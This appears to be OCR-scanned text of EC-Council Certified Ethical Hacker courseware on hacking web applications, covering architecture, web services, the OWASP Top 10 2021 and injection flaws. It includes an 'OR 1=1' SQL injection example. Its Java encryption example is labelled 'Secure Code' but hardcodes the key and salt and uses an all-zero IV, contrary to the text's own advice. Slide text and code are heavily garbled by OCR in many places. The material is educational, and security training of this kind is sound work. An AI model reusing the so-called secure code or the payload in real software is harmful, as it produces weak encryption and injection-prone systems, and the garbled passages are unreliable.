Increasing Internet usage and expanding online businesses have accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business purposes is the multitude of features that they offer. Moreover, they are secure and relatively easy to develop. In addition, they offer better services than many computer-based software applications and are easy to install, maintain, and update. Module 14 Page 1884
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
The advantages of web applications are listed below: As they are independent of the operating troubleshooting are easy and cost-effective. They are accessible connection.
anytime
and
anywhere
system,
using
a
their
development
computer
with
an
and
Internet
The user interface is customizable, making it easy to update. Users can access them smartphones, etc.
on
any
device
having
an
Internet
browser,
including
PDAs,
Dedicated servers, monitored and managed by experienced server administrators, store all the web application data, allowing developers to increase their workload capacity. Multiple locations of servers not only increase physical security but also reduce the burden of monitoring thousands of desktops using the program. They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, .NET, and scripting languages, which are scalable and support even portable platforms.
Although web applications enforce certain security policies, they are vulnerable attacks such as SQL injection, cross-site scripting, and session hijacking.
to various
How Web Applications Work The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser. This mechanism involves the following steps: First, the user enters the website name or URL in the browser. Then, the user's request is sent to the web server. On receiving the request, the web server checks the file extension:
o
If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
o
If the user requests a web page with an extension that needs to be processed at the server side, such as php, asp, and cfm, then the web application server must process the request.
Therefore, the web server passes the which processes the user’s request.
user's request to the web
application
server,
The web application server then accesses the database to perform the requested task by updating or retrieving the information stored on it. After processing the request, the web application server finally sends the results to the web server, which in turn sends the results to the user's browser.
Module 14 Page 1885
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
User — Login Form
Internet
Firewall
Web Server
Operating System 1D 6329
Topic | Tech
SELECT * from news where id = 6329
Figure 14.1: Working of web applications
Web Application Architecture Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of
the web application depends on its architecture, which includes hardware and software that perform tasks such as reading the request as well as searching, gathering, and displaying the required data. The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It consists
of three layers: 1.
Client or presentation layer
2.
Business logic layer
3.
Database layer
The client or presentation layer includes all physical devices present on the client side, such as laptops, smartphones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server then responds to the request and fetches the requested data; the application finally displays this response in the browser in the form of a web page. The “business logic” layer itself consists of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component, e.g., a server. The firewall offers security to the content, the HTTP request parser handles requests coming from clients and forwards responses to them, and the resource handler is capable of handling multiple requests simultaneously. The webserver logic layer contains code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).
Module 14 Page 1886
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Applications
The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and “middleware”. It defines the flow of data, according to which the developer builds the application using programming languages. It stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database. This layer contains the software and defines the steps to search and fetch the data. The database layer consists of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization’s production data in a structured form (e.g., MS SQL Server, MySQL server).
Figure 14.2: Web Application Architecture
Module 14 Page 1887
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
Web Services
clEH
@ Aweb service is an application or software that is deployed over the Internet and uses standard messaging protocols such as SOAP, UDDI, WSDL, and REST to enable communication
platforms
Types of Web Services ‘|G
applications developed for different
Web Service Architecture
SOAP web services
© tis basedon the XML format andis
-
used to transfer data between a service
provider and requestor
(G
between
Service Registry (Contains Service
Descriptions)
RESTful web services
©
Itis basedona
set of constraints using
underlying HTTP concepts to improve performance
aay
Service
Requester
Service Provider
(Contains Service and
Service Descriptions)
Web Services Aweb service is an application or software that is deployed over the Internet. It uses a standard messaging protocol (such as SOAP) to enable communication between applications developed on different platforms. For instance, Java-based services can interact with PHP applications. These web-based applications are integrated with SOAP, UDDI, WSDL, and REST across the network. Web Service Architecture A web service architecture describes the interactions among the service provider, service requester, and service registry. These interactions consist of three operations, namely publish,
find, and bind. All these roles and operations work together on web service artifacts known as software modules (services) and their descriptions. Service providers offer web services. They deploy and publish service descriptions of a web service to a service registry. Requesters find these descriptions from the service registry and use them to bind with the web service provider and invoke the web service implementation. There are three roles in a web service: =
Service Provider: It is a platform from where services are provided.
=
Service Requester: It is an application or client that is seeking a service or trying to establish communication with a service. In general, the browser is a requester, which invokes the service on behalf of a user.
=
Service Registry: It is the place where service requester discovers the service descriptions.
Module 14 Page 1888
the provider loads service descriptions. The and retrieves binding data from the service
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
There are three operations in a web service architecture: =
Publish: During this operation, service descriptions are published to allow the requester to discover the services.
=
Find: During this operation, the requester tries to obtain the service descriptions. This operation can be processed in two different phases: obtaining the service interface description at development time and obtain the binding and location description calls at run time.
=
Bind: During this operation, the requester calls and establishes communication with the services during run time, using binding data inside the service descriptions to locate and invoke the services.
There are two artifacts in a web service architecture: =
Service: It is a software module offered by the service provider over the Internet. It communicates with the requesters. At times, it can also serve as a requester, invoking other services in its implementation.
=
Service Description: It provides interface details and service implementation details. It consists of all the operations, network locations, binding details, datatypes, etc. It can be stored in a registry and invoked by the requester.
al b=). Service Registry (Contains Service Descriptions)
Service
Service Provider (Contains Service and
Requester
Service Descriptions) Figure 14.3: Web Service Architecture
Characteristics of Web Services =
XML-based: Web services use XML for data representation and transportation. XML usage can avoid OS, networking, or platform binding. Applications that provide web services are highly interoperable.
=
Coarse-grained service: In web services, some objects contain a massive amount of information and offer greater functionality than fine-grained services. A coarse-grained service is a combination of multiple fine-grained services.
Module 14 Page 1889
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
=
Loosely coupled: Web services support a loosely coupled approach for interconnecting systems. The interaction between the systems can occur via the web API by sending XML messages. The web API incorporates a layer of abstraction for the infrastructure to make the connection flexible and adaptable.
=
Asynchronous and synchronous support: Synchronous services are called by users who wait for a response, whereas asynchronous services are called by users who do not wait for a response. RPC-based messages and document-based messages are often used for synchronous and asynchronous web services. Synchronous and asynchronous endpoints are implemented using servlets, SOAP/XML, and HTTP.
=
RPC support: Web services support remote procedure calls (RPC) similarly to traditional applications.
Types of Web Services
Web services are of two types: =
SOAP web services The Simple Object Access Protocol (SOAP) defines the XML format. XML is used to transfer data between the service provider and the requester. It also determines the procedure to build web services and enables data exchange between different
programming languages.
=
RESTful web services REpresentational State Transfer (RESTful) web services are designed to make services more productive. They use many underlying HTTP concepts to define services. It is an architectural approach rather than a protocol like SOAP.
the the
Components of Web Service Architecture:
=
UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available.
=
WSDL: Web Services Description Language is an XML-based language that describes and traces web services.
=
WS-Security: Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.
There are other important features/components of the web service architecture, such as WSWork Processes, WS-Policy, and WS Security Policy, which play an important role in communication between applications.
Module 14 Page 1890
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Applications
Vulnerability Stack
CEH Business Logic Flaws Technical Vulnerabilities
Third-party Components Web Server
Open Source / Commercial
j
che/ Microsoft IIS
Database
/ Ms sau
Operating System
Windows /Linux/ macOS
Network
/ Switch
Security
IPS / IDS
Layer1.
Vulnerability Stack One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each layer enable the user to access the web application securely. When considering web applications, the organization considers security as a critical component because web applications are major sources of attacks. The vulnerability stack shows various layers and the corresponding elements/mechanisms/services that make web applications vulnerable.
Coston lee eee
EB)
Third-party Components
ayer Layer 6
mg
Business Logic Flaws
r )
Technical Vulnerabilities
GS)
Open Source / Commercial
Web Server
Apache / Microsoft IIS
Database
Oracle / MySQL / Ms SQL
Operating System
—
Security
gz
ers
(0,0)
Windows / Linux / macOS
oer" a
A
IPs / IDS
Layer1
Figure 14.4: Vulnerability Stack
Module 14 Page 1891
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
Attackers exploit the vulnerabilities of one or more elements among the seven levels to gain unrestricted access to an application or the entire network.
Layer 7 If an attacker finds vulnerabilities in the business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS. Layer 6 Third-party components are services that integrate with the website to achieve certain functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website). When customers choose a product to buy, they click on the Buy/Checkout button. This redirects them to their online banking account through a payment gateway. Third-party websites such as citrix.com offer such payment gateways. Attackers might exploit such redirection and use it as a medium/pathway to enter Amazon.com and exploit it.
Layer5 Web servers are software programs that host websites. When users access a website, they send a URL request to the web server. The server parses this request and responds with a web page that appears in the browser. Attackers can perform footprinting on a web server that hosts the target website and grab banners that contain information such as the web server name and its version. They can also use tools such as Nmap to gather such information. Then, they might start searching for published vulnerabilities in the CVE database for that particular web server or service version number and exploit any that they find.
Layer 4 Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. There could be vulnerabilities in the database of the target website. These vulnerabilities can be exploited by attackers using tools such as sqlmap to gain control of the target’s database.
Layer 3 Attackers scan an operating system to find open ports and vulnerabilities, and they develop viruses/backdoors to exploit them. They send malware through the open ports to the target machine; by running such malware, they can compromise the machine and gain control over it. Later, they try to access the databases of the target website. Layer 2
Routers/switches route network traffic only to specific machines. Attackers flood these switches with numerous requests that exhaust the CAM table, causing it to behave like a hub. Then, they focus on the target website by sniffing data (in the network), which can include credentials or other personal information.
Module 14 Page 1892
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Web Applications
=
Exam 312-50 Certified Ethical Hacker
Layer1 IDS and IPS raise alarms if any malicious traffic enters a target machine or server. Attackers adopt evasion techniques to circumvent such systems so that they do not trigger any alarm while exploiting the target.
Module 14 Page 1893
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
CEH LO#02: Demonstrate Web Application Threats
Copyright © by
Web Application Threats Attackers attempt various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses the various types of threats and attacks against the vulnerabilities of web applications.
Module 14 Page 1894
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
OWASP Top 10 Application Security Risks - 2021
CEH
AOG6
Vulnerable and Outdated
O02 — Cryptographic Failures
AOZ
Identification and Authentication
A03
Injection
A08
04
Insecure Design
AQ1
AOS
Broken Access Control
Security Misconfiguration
0g
AlO
Components
failures
Software and Data Integrity Failures Security Logging and Monitoring Failures Server-Side Request Forgery (SSRF)
ps /fowasp 79 erved. Reproduction i Stcty Prohiated
OWASP Top 10 Application Security Risks - 2021 Source: https://owasp.org OWASP is an international organization that maintains a list of the top 10 vulnerabilities and flaws of web applications. The latest OWASP top 10 application security risks are as follows. =
A01- Broken Access Control This vulnerability is related to improperly enforced restrictions on the actions of authenticated users. Attackers can exploit these flaws to access unauthorized functionality and/or data such as access to other user accounts, viewing of sensitive files, modifications to other user data, and changes to access rights.
=
A02 - Cryptographic Failures Many web applications and APIs do not properly protect sensitive data, such as financial data, healthcare data, and personally identifiable information (PII). Moreover, many application developers fail to implement strong cryptographic keys, use old keys, or fail to enforce proper key management. In such cases, sensitive data can be transmitted in cleartext through HTTP. Attackers can leverage this flaw to steal or modify such weakly protected data to perform credit-card fraud, identity theft, or other crimes. Sensitive data require extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with a browser.
=
A03 — Injection Injection flaws, such as SQL command injection and LDAP injection, occur when untrusted data are sent to an interpreter as part of a command or query. The attacker’s
Module 14 Page 1895
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. =
A04- Insecure Design
During application development, if security controls are not properly implemented considering the latest business risks, various design flaws may occur. These design flaws can compromise the integrity, confidentiality, and authenticity of data. Attackers can exploit these flaws to perform session hijacking, credential theft, spoofing, and other types of MITM attacks. =
A05 - Security Misconfiguration Security misconfiguration is the most common issue in web security, which is due in part to manual or ad hoc configuration (or no configuration at all); insecure default configurations; open S3 buckets; misconfigured HTTP headers; error messages containing sensitive information; and failure to patch or upgrade systems, frameworks, dependencies, and components in a timely manner (or at all). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, or DoS attacks such as the billion laughs attack.
=
A06- Vulnerable and Outdated Components Components such as libraries, frameworks, and other software modules run with the same privileges as the application. The software components need to be updated or patched in a timely manner based on the current risks, failing which they can leave serious vulnerabilities as they become outdated. An attack exploiting a vulnerable component can cause serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
=
A07 - Identification and Authentication Failures Application functions related to identification, authentication and session management are often implemented incorrectly, allowing attackers to launch brute-forcing, password spraying, and other automated attacks to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume the identities of other users (temporarily or permanently).
=
A08 — Software and Data Integrity Failures Many applications are implemented with auto-update features. Such applications may download updates from unauthorized or previously trusted sources without conducting sufficient integrity checks. Attackers can take advantage of this flaw and load their own updates to distribute malware. Moreover, if data are encoded or serialized into an easily understandable format, attackers can alter the data, leading to an insecure deserialization flaw.
Module 14 Page 1896
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications =
Exam 312-50 Certified Ethical Hacker
A09 — Security Logging and Monitoring Failures Security logging and monitoring failures occur via insufficient log monitoring, the local storage of logs, inadequate error messages, inappropriate alert mechanisms for failedlogin attempts, or applications failing to identify threats in advance. Such vulnerabilities can leak sensitive information that can be leveraged by the attackers to compromise a system or account, tamper with credentials, or destroy data.
=
A10- Server-Side Request Forgery (SSRF) Server-Side Request Forgery (SSRF) is a web security vulnerability that arises when remote resources are obtained by an application without verifying the URL entered by the user. Attackers leverage this vulnerability to abuse the functionalities of a server to read or modify internal resources and steal sensitive information by sending malicious requests. SSRF vulnerabilities also allow attackers to send malicious requests to internal systems, even if they are secured by firewalls..
Module 14 Page 1897
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
A0O1 - Broken Access Control
CE H
@ Access control refers to how a web application grants access to its content and functions for some privileged users and restricts others
@ Broken access control is a method in which an attacker identifies a flaw related to access control and bypasses the authentication, which allows them to compromise the network
@ Itallows an attackerto act as users or administrators with privileged functions and create, access, update or delete every record
‘Access Control
Web Application
Copyright © by
A01 - Broken Access Control Access control refers to how a web application grants access to create, update, and delete any record/content or function to some privileged users while restricting access to other users. Broken access control is a method by which an attacker identifies a flaw related to access control, bypasses the authentication, and then compromises the network. Access control weaknesses are common because of the lack of automated detection and effective functional testing by application developers. They allow attackers to act as users or administrators with privileged functions and create, access, update, or delete any record. According to OWASP control are as follows:
2021
R3
revision, the common
vulnerabilities
associated
with
access
=
Abusing the least privileges or denying it by default, where everyone gains access to the roles, users, or abilities instead of having specific accessibility.
=
Evading the filtering of access controls by changing the URL, API request, an HTML page, or the application state via parameter tampering, force browsing, or any attacking tool .
=
Gaining permission identifier.
=
Gaining access to the APIs without the access controls for PUT, POST, and DELETE.
=
Escalating privileges, where a user can act as an administrator after logging in.
=
Manipulating the metadata; for example, the manipulation of a hidden field or alteration of a JSON Web Token (JWT) access-control token or a cookie for exploiting JWT invalidation or elevating privileges.
Module 14 Page 1898
to
read
or
modify
someone’s
account
through
their
unique
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
=
Accessing API via illegitimate sources exploiting cross-origin misconfiguration .
=
Force browsing respectively.
=) ror
to
privileged
Request
or
authentic
pages
as
a
resource sharing (CORS) valid
or
an
invalid
user,
Request
Privileged users Web Application
Access Control Access Denied
Figure 14.5: Broken access-control attack
Module 14 Page 1899
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
A02 — Cryptographic Failures/Sensitive Data Exposure @ Many web applications do not properly protect their sensitive data from unauthorized users @ Sensitive data exposure occurs due to flaws like insecure cryptographic storage and information leakage @ When an application uses poorly written encryption code to securely encrypt and store sensitive data in the database, an attacker can exploit this flaw and steal or modify weakly protected sensitive data such as credit cards numbers, SSNs, and other authentication credentials
Vulnerable Code
public String encrypt (String plaintext) { y; plainvext = plaintext .replace ( plainText = plaintext .replace ( return Base64Encoder. encode (plaintext); }
CE H
Secure Code
private static String sey = "zoccccccccom! private static String salt = Yooohhhhhhhhhhh! 1 1"; public static String encrypt (String plainText) { bytel] iv= { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 09; IvParameterspec ivspec = new IvParameterSpec (iv); SecretKeyFactory factory = new Secre tKey Fact ory. get Instance ("PSKDE2Wi thiimacSHA256") ; KeySpec = now PEEXeySpec (sKey.toCharArray(), salt.getBytes(), 65536, 256);
SecretKey key = factory.generatesecret (keyspec) ; SecretKeySpec secretKey = new SecretKeySpec (key.gatEncoded() , "AES")
Cipher = Cigar. getmntanon ("aRA/CRC/ MRCREPedding") 7 cipher.init (Cipher. ENCRYPT MODE, secretKey, ivspec); byte[] utsBtext = plaintext.getBytes (*UTF-8”) ; byte(] enryptediext = cipher.doFinal (utfatext) ; return Base6tEncoder. encodeToString(encryptedText) ; )
A02 - Cryptographic Failures/Sensitive Data Exposure Web applications need to store sensitive information such as passwords, credit-card numbers, account records, and other authentication information in a database or on a file system. If users do not maintain the proper security of their storage locations, the application may be at risk as attackers can access the storage and misuse the information. Many web applications do not properly protect their sensitive data from unauthorized users. Web applications use cryptographic algorithms to encrypt data and other sensitive information that they need to transfer from the server to the client or vice versa. Sensitive data exposure occurs because of flaws such as insecure cryptographic storage and information leakage. Although the data are encrypted, some cryptographic encryption methods have inherent weaknesses that allow attackers to exploit and steal the data. When an application uses poorly written encryption code to encrypt and store sensitive data in a database, the attacker can easily exploit this flaw to steal or modify weakly protected sensitive data such as credit-cards numbers,
SSNs,
and
other
authentication
credentials.
Thus,
they
can
launch
further
attacks
such as identity theft and credit-card fraud. Developers can avoid such attacks using algorithms to encrypt sensitive data. At the same time, developers must take precautions to store cryptographic keys securely. If these keys are stored at insecure locations, then attackers can retrieve them easily and decrypt the sensitive data. The insecure storage of keys, certificates, and passwords also allows the attacker to gain access to the web application as a legitimate user. Furthermore, developers must check the randomness of the initialization vectors (IVs) used in the encryption algorithms. Developers should ensure that the IVs are not reused and are generated using secure cipher modes of operation. Moreover, developers must avoid using deprecated hash functions such as MD5 and SHA-1 and deprecated padding methods such as PKCS 1/1.5. Cryptographic failures can cause Module 14 Page 1900
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
severe losses to a company. Hence, organizations must protect all their resources such as systems or other network resources from information leakage by employing proper contentfiltering mechanisms. Additionally, organizations should ensure that cryptographic error messages and side-channel information do not leave any clue for exploitation. The screenshots below show poorly encrypted vulnerable code and secure code that is properly encrypted using a secure cryptographic algorithm, respectively.
Vulnerable public
String
encrypt
Code
(String
plainText)
{
plainText
= plainText.replace(“a”,”z”)
;
plainText
= plainText.replace(“b”,”y”)
;
return
Base64Encoder.encode(plainText) ;
}
Figure 14.6: Vulnerable code example
Secure Code private
static String sKey = “zoooocccccom! !!!";
private
static String salt = “ooohhhhhhhhhhh!!!!";
public static String encrypt (String plainText) byte[]
{
iv = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
IvParameterSpec
ivspec = new IvParameterSpec (iv) ;
SecretKeyFactory factory = new SecretKeyFactory .get Instance ("PBKDF2Wi thHmacSHA256") ; KeySpec
65536,
= new
256);
PBEKeySpec(sKey.toCharArray(),
SecretKey key = factory.generateSecret SecretKeySpec "AES") ; Cipher
secretKey
salt.getBytes(),
(keySpec) ;
= new SecretKeySpec (key .getEncoded() ,
= Cipher.getInstance
("AES/CBC/PKCS5Padding")
cipher. init (Cipher.ENCRYPT MODE, secretKey,
;
ivspec) ;
byte[]
ut£8text = plainText.getBytes (“UTF-8”) ;
byte[]
enryptedText = cipher.doFinal (utf8text) ;
return
Base64Encoder.encodeToString(encryptedText) ;
}
Figure 14.7: Secure code example
Module 14 Page 1901
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
A03 - Injection Flaws
clEH
@ Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of acommand or query @ Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access @ Injection flaws are prevalentin legacy code, often found in SQL, LDAP, XPath queries, and so on and can be easily discovered by application vulnerability scanners and fuzzers
SQL Injection
| @ Itinvolves the injection of malicious SQL queries into user input forms
Command
7 woe @ It involves the bpiacti, injection of malicious code through a web application u 8 PP
Injection
|
LDAP Injection
| @ Itinvolves the injection of malicious LDAP statements
Gross-Site Scripting (XXS)
|
| aie 5 al
oe
it involves the injection and execution of malicious scripts in the web browser eo
A03 - Injection Flaws Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Such flaws are prevalent in legacy code and often found in SQL, LDAP, and XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers. Attackers inject malicious code, commands, or scripts in the input gates of flawed web applications such that the applications interpret and run the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below: =
SQL Injection: SQL injection is the most common website vulnerability on the Internet, and it is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.
=
Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting a malicious command in the application to execute supplied arbitrary commands on the host operating system. Thus, such flaws are extremely dangerous.
=
LDAP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an
Module 14 Page 1902
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
application fails to sanitize the user input, the attacker modifies the LDAP statement with the help of a local proxy. This, in turn, results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree. =
Cross-Site Scripting (XSS) XSS flaws occur when an application includes untrusted data in a new web page without proper validation or escaping, or when an application updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to inject and execute scripts in the victim’s browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.
Module 14 Page 1903
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
SQL Injection Attacks
cE H
@ SQL injection attacks use a seriesof malicious SQL queries to directly manipulate the database @ Anattacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data @ SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches
o
01 | SQL injection vulnerable server code
Note: For complete coverage of SQL Injection concepts and techniques, referto Module 15: SQL Injection
SQL Injection Attacks SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users, validate roles and access levels, store and retrieve information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate the input before passing it to an SQL statement. For example, consider the following SQL statement: SELECT
*
FROM
tablename
WHERE
UserID=
2302
becomes the following with a simple SQL injection attack: SELECT
*
FROM
tablename
WHERE
UserID=
2302
OR
1=1
The expression “OR 1=1” evaluates to the value “TRUE,” often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. Attackers carry out SQL injection attacks from the web browser’s address bar, form fields, queries, searches, and so on. SQL injection attacks allow attackers to
=
Log into the application without supplying valid credentials
=
Perform queries against data in the database, often even data to which the application would not normally have access
=
Modify database contents or drop the database altogether
=
Use the trust relationships established between access other databases
Module 14 Page 1904
the web application components to
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Applications
Exam 312-50 Certified Ethical Hacker
01 |